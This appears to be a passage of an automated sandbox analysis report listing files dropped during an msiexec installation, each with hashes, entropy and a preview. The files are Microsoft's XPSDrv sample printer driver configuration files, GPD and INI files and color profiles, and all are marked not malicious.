                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdsmpl.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver main GPD file...*%....*GPDFileVersion: "1.2"..*GPDSpecVersion: "1.2"..*GPDFileName: "XDSmpl.gpd"..*Include: "msxpsinc.gpd"..*Include: "StdNames.gpd"..*Include: "xdnames.gpd"..*Include: "xdwmark.gpd"..*Include: "xdbook.gpd"..*Include: "xdcolman.gpd"..*Include: "xdnup.gpd"..*Include: "xdpgscl.gpd"..*ModelName: "XPSDrv Sample Driver"..*MasterUnits: PAIR(1200, 1200)..*ResourceDLL: "unires.dll"..*PrinterType: PAGE..*MaxCopies: 1....*%*********************************************************************
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):475
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.248799523355892
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:;..; Copyright (c) 2005 Microsoft Corporation..;..; All rights reserved...;..; THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..; ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..; THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..; PARTICULAR PURPOSE...;..; File Name:..;..; xdsmpl.ini..;..; Abstract:..;..; XPSDrv sample driver configuration file for UI plug-in...;....[OEMFiles]..OEMConfigFile1=xdsmplui.DLL......
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1554
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.555759044915239
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:FCDZkHSs9/9Tmm8LYReOR1RwrRpRajx8LZRzQRVRC:sDuHnmmoYRVR1RwrRpRajxoZRcRVRC
                                                                                                                                                                                                                                                                                                                                  MD5:C922269B15071195905ACE600AC9B02C
                                                                                                                                                                                                                                                                                                                                  SHA1:BCC559EBBFCAC61A67905B5DBB9D3E8E27D413E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:2FC61A7629E0382699E8178AC8131666BB1BADA65F9B7AC738E7620C1D3A4E40
                                                                                                                                                                                                                                                                                                                                  SHA-512:C4ACE0F94150ED02580A365798981FD30484B3E13576624620377F077AD4A6C0AA06ED3DBC1B8A64406F357321A9AD027A1A12D9C98A407D27B58CA857D74E84
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdwmark.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver watermark specific GPD settings...*%....*%******************************************************************************..*% PageWatermark..*%******************************************************************************..*Feature: PageWatermarkType..{.. *rcNameID: =IDS_GPD_WATERMARKTYPE.. *DefaultOption: None.... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. }.... *Option: Text.. {.. *rcNameID: =IDS_GPD_TEXT.. }.... *Option: Raster.. {.. *rcNameID: =IDS_GPD_RASTERIMAGE.. }.... *Option: Ve
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Microsoft color profile 2.2, type lino, RGB/Lab-spac device by MSFT, 124856 bytes, 10-5-2006 12:14:35 "Created by Microsoft WCS from DMP: scRGB virtual device model profile, CAMP: Default sRGB monitor, and GMMP: Default Gamut M"
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):124856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.796177094859484
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:wq47C9ZJMKkyYHlMRyu2FK0MjUq2mX14F4Q7asMM06KI:w29bMPyASyumQwmleHf91
                                                                                                                                                                                                                                                                                                                                  MD5:45CC4B43673056B8625ADD43EFDF33DD
                                                                                                                                                                                                                                                                                                                                  SHA1:2A7E28C7696CAF775344A31A23DCDADF15A5F1BD
                                                                                                                                                                                                                                                                                                                                  SHA-256:089BE57682C9F866DCCE74E1D174AA9816BC0992C1CE6EC01E03958964EF852A
                                                                                                                                                                                                                                                                                                                                  SHA-512:08A1FEA06EED5B874BE487F0F523ADCB98262FFA7158F54A724963827ACBF6318EEE99948AEB999C6F6EF875EA04E2B2377CBE623BB4679FB90BE785C75560DC
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Microsoft color profile 2.2, type lino, CMYK/Lab-prtr device by MSFT, 849080 bytes, 10-5-2006 15:02:14 "Created by Microsoft WCS from DMP: CMYKPrinter.cdmp, CAMP: Default sRGB monitor, and GMMP: Default Gamut Map Model Profile f"
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):849080
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.924819797081704
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:nupHTMj2vkdYa+kYfwx+rbgal21W0M5SU1yr2U5fOFQw8LHxrLiYJVarTH46xL1F:upgavkz+UIUBRm020G7
                                                                                                                                                                                                                                                                                                                                  MD5:8EE08E7B69A5F2ECA6BB3A5EEDB48649
                                                                                                                                                                                                                                                                                                                                  SHA1:FF7CFA21BDCB220EC0450E76A1C2AB0854CAEBD6
                                                                                                                                                                                                                                                                                                                                  SHA-256:2B215C1FA5CAA10582BDAFE6B51A911C9D8B2B0B456EEEFF955064FDC3844D98
                                                                                                                                                                                                                                                                                                                                  SHA-512:12AEA33F800D5203811DE1FFA1181BD1B8A58C54BD52A9D2BF7A4084CC2BBC52C9E74E9434C41C6B1EB2CA451E81D5E11B3CE6B827BA4B0F14927EB4FAD62FF0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1808
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.525972600570173
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:FCDZkHSs9/9QltHlRIORmRCjR73RpRvrmRCgORmRCjR73RpRS:sDuH87FRDRmRCjRrRpRvrmRCbRmRCjRI
                                                                                                                                                                                                                                                                                                                                  MD5:9303837EFF41196B0FC3D6AD46FE43AF
                                                                                                                                                                                                                                                                                                                                  SHA1:9AFBCA730F3A98C5C43AC1AF156BCD6C3CE366E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:ABD2E8A90B9949D61DF21DF88AED7040542555A0228BB0B375439F8488A06294
                                                                                                                                                                                                                                                                                                                                  SHA-512:9F8C9956CEB14B7A275B346A48A1C010DEB23D94BAB4E0FFD395D23B5573533EB80630092CA6A458D33762E55C260752CA294B5E0632179ECC18F17A0B961D55
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdbook.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver Booklet specific GPD settings...*%....*%******************************************************************************..*% JobBindAllDocuments..*%******************************************************************************..*Feature: JobBindAllDocuments..{.. *rcNameID: =IDS_GPD_JOBBINDING.. *DefaultOption: None.... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. }.... *Option: BindLeft.. {.. *rcNameID: =IDS_GPD_LTOR.. }.... *Option: BindRight.. {.. *rcNameID: =IDS_GPD_RTOL.. }.... *Option:
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2718
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.658165462032682
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:FCDZkHSs9/9xmSx8iZR/+eRxSRURJPRo/8nRFGR7RrXh8TpR9KbzkR5BMLkRWkc4:sDuHN/DRFRkRURJPRo/ARYR7Rrx+R98+
                                                                                                                                                                                                                                                                                                                                  MD5:3F80884F3D1F3B9D5D3C7279131ECB4D
                                                                                                                                                                                                                                                                                                                                  SHA1:17AB016E8AFA453B5A7DA19A6F2AB6AE0B3D78F4
                                                                                                                                                                                                                                                                                                                                  SHA-256:4D09EE22E6A9BFB33E13F5391830FFDA13A572DC6DA1E22D1DEE3D4CAD7BBBD9
                                                                                                                                                                                                                                                                                                                                  SHA-512:363579BDE28329209801FFA7EE0A3A5DD4278886453221768D2F3D7A1ECFE348884004FA08F9B6006E35A6098B72F1738B7B425C9AC8F5F2ACBDC5FD26EEA50A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdcolman.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver Color Management specific GPD settings...*%....*%******************************************************************************..*% PageColorManagement..*%******************************************************************************..*Feature: PageColorManagement..{.. *rcNameID: =IDS_GPD_PAGECOLMAN.. *DefaultOption: None.. *PrintSchemaKeywordMap: "PageColorManagement".... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. *PrintSchemaKeywordMap: "None".. }.... *Option: Device.. {.. *rcNameID: =IDS_GPD_D
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):6871
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6709110049190015
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:sDuHL5cq9ORGELoQ+4JH3U/y5EDeP8N4f6TfSqXYY0s9DOS:3HL5G0Ex+AX0yAePzO0S
                                                                                                                                                                                                                                                                                                                                  MD5:9196C9FAF999C94DA04F4679E823D753
                                                                                                                                                                                                                                                                                                                                  SHA1:BF4445CFF27EC04248BB645C74AAAF6B1EE95B6D
                                                                                                                                                                                                                                                                                                                                  SHA-256:411DFDB99C624831D1E755AD5D861ECE1C2EFCEF23A6C7F89F6C2BA251BBED0A
                                                                                                                                                                                                                                                                                                                                  SHA-512:94A3C1F51B03A91220F9AEF9D8BDDAB6DAD74BE971D5D16B5B308DC5403DE1AFCB3A8D40E0F48CEC1834DE596192BED99C78B03B2538A9594B99347B589650B1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdnames.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver GPD resource names...*%....*CodePage: 1252 *% Windows 3.1 US (ANSI) code page....*Feature: RESDLL..{.. *Name: "resource dll files".. *ConcealFromUI?: TRUE.... *Option: UniresDLL.. {.. *Name: "unires.dll".. }.. *Option: xdsmplui.. {.. *Name: "xdsmplui.dll".. }..}....*Macros: StdFeatureNames..{.. IDS_GPD_1PPS: RESDLL.xdsmplui.2000.. IDS_GPD_2PPS: RESDLL.xdsmplui.2001.. IDS_GPD_4PPS: RESDLL.xdsmplui.2002.. IDS_GPD_6PPS: RESDLL.xdsmplui.2003.. IDS_GPD_8PPS:
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4068
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.508459493570281
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:sDuHqDYRxRGRDRPRbRERfRSdg9Re9RxjR4RURFRjjRkRSRA1sogRyRGRDRPRbREN:3HqZtgst0P
                                                                                                                                                                                                                                                                                                                                  MD5:CFFD55A27BDF496CABE9C41E80A42A72
                                                                                                                                                                                                                                                                                                                                  SHA1:09225D86A48948152DE3AF346491B893579253CA
                                                                                                                                                                                                                                                                                                                                  SHA-256:D0B69D3877190BFAFCADB90D9D4F6C81DA15CD5E3CBE45BAB4E60BC812FF32C0
                                                                                                                                                                                                                                                                                                                                  SHA-512:D1F0A7C72657897B2394D8C166D4E079CAB6CC3BE35621A8B014F541A1A73245DDD0865C4AE810E1784AC973AEA0419F7DFC42DA42A5B81284B539DC0A24EB29
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdnup.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver NUp specific GPD settings...*%....*%******************************************************************************..*% JobNUpAllDocumentsContiguously..*%******************************************************************************..*Feature: JobNUpAllDocumentsContiguously..{.. *rcNameID: =IDS_GPD_JOBNUP.. *DefaultOption: 1.. *PrintSchemaKeywordMap: "JobNUpAllDocumentsContiguously".... *Option: 1.. {.. *rcNameID: =IDS_GPD_1PPS.. }.... *Option: 2.. {.. *rcNameID: =IDS_GPD_2PPS.. }.... *Option: 4.. {..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2522
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.708364933060842
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:FCDZkHSs9/9Ydp88+qRIOR3NRXRAR6R5eR7RZboRaYipRazRapjRafRa6RamRaRA:sDuHco4RDR3NRXRAR6R5eR7RZboRaYuY
                                                                                                                                                                                                                                                                                                                                  MD5:F492FC30EFAE3C1548C17D4419E37778
                                                                                                                                                                                                                                                                                                                                  SHA1:887F31639800999D7225AF1EE3F26B601D726401
                                                                                                                                                                                                                                                                                                                                  SHA-256:08FF54CC8DC7E978B8129017307F4455025FC37F891A9EE6CAD37ADA5EB0CEC7
                                                                                                                                                                                                                                                                                                                                  SHA-512:0F354DBC8B430B168EBAA1BBBAE48DFC6DD285912C1324673BD04AFBDD2947CC3BA8448B440337655377A43A40DC9592CDE26F71A635EEB12746877971C5519D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdpgscl.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver page scaling specific GPD settings...*%....*%******************************************************************************..*% PageScaling..*%******************************************************************************..*Feature: PageScaling..{.. *rcNameID: =IDS_GPD_PAGESCALING.. *DefaultOption: None.... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. }.... *Option: Custom.. {.. *rcNameID: =IDS_GPD_CUSTOM.. }.... *Option: CustomSquare.. {.. *rcNameID: =IDS_GPD_CUSTSQUARE.. }.... *Option:
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2476
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.158189280019379
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:qDG8kHYKsJyhBk//ojAd+6IG0c9RLN0KUvfaZhcLNhpMubDUHeLNq63PfaZhcLNM:qDhkHtsI4aV46+ZhOb2tZhzZh7jZh/v
                                                                                                                                                                                                                                                                                                                                  MD5:B628B4F8CC199D26E18FE27BD4A29BBD
                                                                                                                                                                                                                                                                                                                                  SHA1:CBB6FB510D708AE85CC0F715617BCD788A613727
                                                                                                                                                                                                                                                                                                                                  SHA-256:12DCC665FDEFEE3D3D771F5727F86FB812C606FCE0E7A3DA943A2072295D2984
                                                                                                                                                                                                                                                                                                                                  SHA-512:825E8583B140C3CA5C44669AAAEF7654A90977F15FD0959FC17DEE30E18C3275EDFE2366A5C90CE707AF28951A56194CBA0CBEE6967CD95FA9CA8CFD6EF189F3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview: ....Copyright (c) 2005 Microsoft Corporation....All rights reserved.....THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..PARTICULAR PURPOSE.....File Name:.... xdsmpl-pipelineconfig.xml....Abstract:.... XPSDrv sample driver filter configuration file. This identifies the.. filters that comprise the filter pipeline and their order.....-->....<Filters>.. <Filter dll = "XDWMark.dll".. clsid = "{B8B525BF-F147-460a-B2D5-9DFB1F30D0FD}".. name = "Watermark filter">.. <Input guid = "{b8cf8530-5562-47c4-ab67-b1f69ecf961e}" comment="IID_IXpsDocumentProvider"/>.. <Output guid = "{4368d8a2-4181-4a9f-b295-3d9a38bb9ba0}" comment="IID_IXpsDocumentConsumer"/>.. </Filter>.. <Filter dll = "XDScale.dll".. clsid = "{976EDCE4-274E-482a-97
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11986
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7262628705263445
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:3HDc4F4V4U4k4v4g4L4wfyPUc5Bn+vjdQjNuDVjFfJCk72sI/72sIPTZGjo2D:KyPUc5Bn+bdsN4jFfJR25T25wZ
                                                                                                                                                                                                                                                                                                                                  MD5:E1F2A2FD0D41438A375F0DDC1822AA7C
                                                                                                                                                                                                                                                                                                                                  SHA1:267F8BFFABCCA4D46556519C105C0C6055B6F6D0
                                                                                                                                                                                                                                                                                                                                  SHA-256:606E0918952F5441D31F5335F09FD6AACAE0A5850A0174280FF34F6772A0B768
                                                                                                                                                                                                                                                                                                                                  SHA-512:1CF4B1E989819ECB134DCBD9C842F69D97A4949ED319D712BF14729C8A0BE0FF22122E3FADC4F4B2A86916F5EBF717E5CCE6E7620DD90EA73551CB523703EC0C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdsmpl.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver main GPD file...*%....*GPDFileVersion: "1.2"..*GPDSpecVersion: "1.2"..*GPDFileName: "XDSmpl.gpd"..*Include: "msxpsinc.gpd"..*Include: "StdNames.gpd"..*Include: "xdnames.gpd"..*Include: "xdwmark.gpd"..*Include: "xdbook.gpd"..*Include: "xdcolman.gpd"..*Include: "xdnup.gpd"..*Include: "xdpgscl.gpd"..*ModelName: "XPSDrv Sample Driver"..*MasterUnits: PAIR(1200, 1200)..*ResourceDLL: "unires.dll"..*PrinterType: PAGE..*MaxCopies: 1....*%*********************************************************************
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):475
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.248799523355892
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:fp+BF8aNytrHLCSKsSHUJhGbkxIESnPEcF4RqWo40nUv:fp+D8MkHLNKsSyh2kBoP3FsqA02
                                                                                                                                                                                                                                                                                                                                  MD5:2EFCEBC23D661F3BFA0A4A4BE0588466
                                                                                                                                                                                                                                                                                                                                  SHA1:1ED92AEC943CFE143A7DBBCE2A82141D67FB9169
                                                                                                                                                                                                                                                                                                                                  SHA-256:DC50AFD088B0D72935D0CDF8F99071A7C80A4979BC9AF915016DD847F222EBE9
                                                                                                                                                                                                                                                                                                                                  SHA-512:FC1FF31E2CBFA1BC8A825548C6C4661236FAF12D8B75F25010E783DE116FC48B61F0188A4673C2C60A52181F6E7F0EFE39BF9B0A7D35B1937EC02B97FCCB7955
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:;..; Copyright (c) 2005 Microsoft Corporation..;..; All rights reserved...;..; THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..; ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..; THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..; PARTICULAR PURPOSE...;..; File Name:..;..; xdsmpl.ini..;..; Abstract:..;..; XPSDrv sample driver configuration file for UI plug-in...;....[OEMFiles]..OEMConfigFile1=xdsmplui.DLL......
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1554
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.555759044915239
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:FCDZkHSs9/9Tmm8LYReOR1RwrRpRajx8LZRzQRVRC:sDuHnmmoYRVR1RwrRpRajxoZRcRVRC
                                                                                                                                                                                                                                                                                                                                  MD5:C922269B15071195905ACE600AC9B02C
                                                                                                                                                                                                                                                                                                                                  SHA1:BCC559EBBFCAC61A67905B5DBB9D3E8E27D413E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:2FC61A7629E0382699E8178AC8131666BB1BADA65F9B7AC738E7620C1D3A4E40
                                                                                                                                                                                                                                                                                                                                  SHA-512:C4ACE0F94150ED02580A365798981FD30484B3E13576624620377F077AD4A6C0AA06ED3DBC1B8A64406F357321A9AD027A1A12D9C98A407D27B58CA857D74E84
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdwmark.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver watermark specific GPD settings...*%....*%******************************************************************************..*% PageWatermark..*%******************************************************************************..*Feature: PageWatermarkType..{.. *rcNameID: =IDS_GPD_WATERMARKTYPE.. *DefaultOption: None.... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. }.... *Option: Text.. {.. *rcNameID: =IDS_GPD_TEXT.. }.... *Option: Raster.. {.. *rcNameID: =IDS_GPD_RASTERIMAGE.. }.... *Option: Ve
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Microsoft color profile 2.2, type lino, RGB/Lab-spac device by MSFT, 124856 bytes, 10-5-2006 12:14:35 "Created by Microsoft WCS from DMP: scRGB virtual device model profile, CAMP: Default sRGB monitor, and GMMP: Default Gamut M"
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):124856
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.796177094859484
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:wq47C9ZJMKkyYHlMRyu2FK0MjUq2mX14F4Q7asMM06KI:w29bMPyASyumQwmleHf91
                                                                                                                                                                                                                                                                                                                                  MD5:45CC4B43673056B8625ADD43EFDF33DD
                                                                                                                                                                                                                                                                                                                                  SHA1:2A7E28C7696CAF775344A31A23DCDADF15A5F1BD
                                                                                                                                                                                                                                                                                                                                  SHA-256:089BE57682C9F866DCCE74E1D174AA9816BC0992C1CE6EC01E03958964EF852A
                                                                                                                                                                                                                                                                                                                                  SHA-512:08A1FEA06EED5B874BE487F0F523ADCB98262FFA7158F54A724963827ACBF6318EEE99948AEB999C6F6EF875EA04E2B2377CBE623BB4679FB90BE785C75560DC
                                                                                                                                                                                                                                                                                                                                  Malicious:false
